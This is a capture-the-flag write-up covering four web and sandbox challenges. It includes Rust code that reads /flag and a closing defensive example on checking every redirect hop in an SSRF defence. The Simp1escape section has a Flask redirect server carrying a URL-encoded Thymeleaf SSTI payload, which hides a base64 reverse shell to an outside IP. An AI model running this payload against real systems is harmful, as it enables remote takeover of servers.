playground

Just prompting ChatGPT a bit was enough to get the solution.

#[cfg(target_os = "linux")]
mod syscalls {
    #[link(name = "c")]
    extern "C" {
        pub fn open(filename: *const u8, flags: i32) -> i32;
        pub fn read(fd: i32, buf: *mut u8, count: usize) -> isize;
        pub fn close(fd: i32) -> i32;
    }
}

fn main() {
    let filename = b"/flag\0" as *const u8;
    let fd = unsafe { syscalls::open(filename, 0) };
    if fd == -1 {
        panic!("Failed to open file");
    }

    let mut buffer = [0u8; 1024];
    let bytes_read = unsafe {
        syscalls::read(fd, buffer.as_mut_ptr(), buffer.len())
    };
    if bytes_read == -1 {
        panic!("Failed to read from file");
    }

    // Convert buffer to string and print
    let content = unsafe {
        core::str::from_utf8_unchecked(&buffer[..bytes_read as usize])
    };
    println!("{}", content);

    unsafe { syscalls::close(fd) };
}


ezphp

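A search turned up this article. I ran the script for two hours without reading anything out, while my teammate succeeded right away.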
After that it comes down to an anonymous class; the code just needs a small change.
class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Fflag.php%3A7%240 is the name of that anonymous class.
See the official documentation for more details.

unauth

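www.zip contains the admin password. After logging in there is a one-line webshell. According to the writeup, a lot of functions were banned, but I couldn't even get echo 1 to print anything, which was really annoying. I even thought it was another troll challenge like the earlier NssRound#20 one that used Java to pretend to be PHP.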

Simp1escape

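Reference: the writeup.
There are three routes: /index, /curl and /getsites. /curl provides something similar to the curl command, but it cannot curl local IPs. /getsites can only be accessed from a local IP and contains the line String dispaly = engine.process(hostname, context);. According to the writeup, this allows Thymeleaf SSTI, and curl can reach the target's /getsites through a 302 redirect.
I don't really understand it, so here I just copy the payload and reproduce it.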

from flask import Flask, redirect
app = Flask(__name__)

@app.route('/', methods=['POST', 'GET'])
def login():
    exp = "%3c%61%20%74%68%3a%68%72%65%66%3d%22%24%7b%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%78%4c%6a%45%35%4c%6a%49%78%4e%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%27%29%7d%22%20%74%68%3a%74%69%74%6c%65%3d%27%70%65%70%69%74%6f%27%3e"
    return redirect(f"http://127.0.0.1:8080/getsites?hostname={exp}")

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=5000)
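
The 302 trick above works because /curl checks only the URL it is handed and not the destinations it is redirected to. The following is an added example, not code from the challenge or the referenced writeup, contrasting that check-once pattern with per-hop validation; the host names, the DNS table and the response table are constructed so it runs offline.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

# Constructed stand-ins for DNS and HTTP so the example runs offline.
DNS = {"redirector.example": ["93.184.216.34"], "public.example": ["93.184.216.34"]}
RESPONSES = {  # url -> (status, Location header, body)
    "http://public.example/": (200, None, "hello"),
    "http://redirector.example/": (302, "http://127.0.0.1:8080/getsites?hostname=x", ""),
    "http://127.0.0.1:8080/getsites?hostname=x": (200, None, "internal page"),
}
REDIRECTS = (301, 302, 303, 307, 308)

def is_internal(host):
    """True if the host is, or resolves to, any non-public address."""
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in DNS.get(host, [])]
    return not addrs or any(not a.is_global for a in addrs)

def check(url):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("blocked scheme or host: " + url)
    if is_internal(parts.hostname):
        raise ValueError("blocked internal destination: " + url)

def fetch_check_once(url, max_hops=5):
    """Weak pattern: validate the first URL only, then follow redirects blindly."""
    check(url)
    for _ in range(max_hops):
        status, location, body = RESPONSES[url]
        if status not in REDIRECTS:
            return body
        url = urljoin(url, location)
    raise ValueError("too many redirects")

def fetch_check_every_hop(url, max_hops=5):
    """Hardened pattern: re-validate the destination before every request."""
    for _ in range(max_hops):
        check(url)
        status, location, body = RESPONSES[url]  # client must not auto-follow
        if status not in REDIRECTS:
            return body
        url = urljoin(url, location)
    raise ValueError("too many redirects")
```

A real client should also connect to the exact address it validated, so that a second DNS lookup cannot return a different IP.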
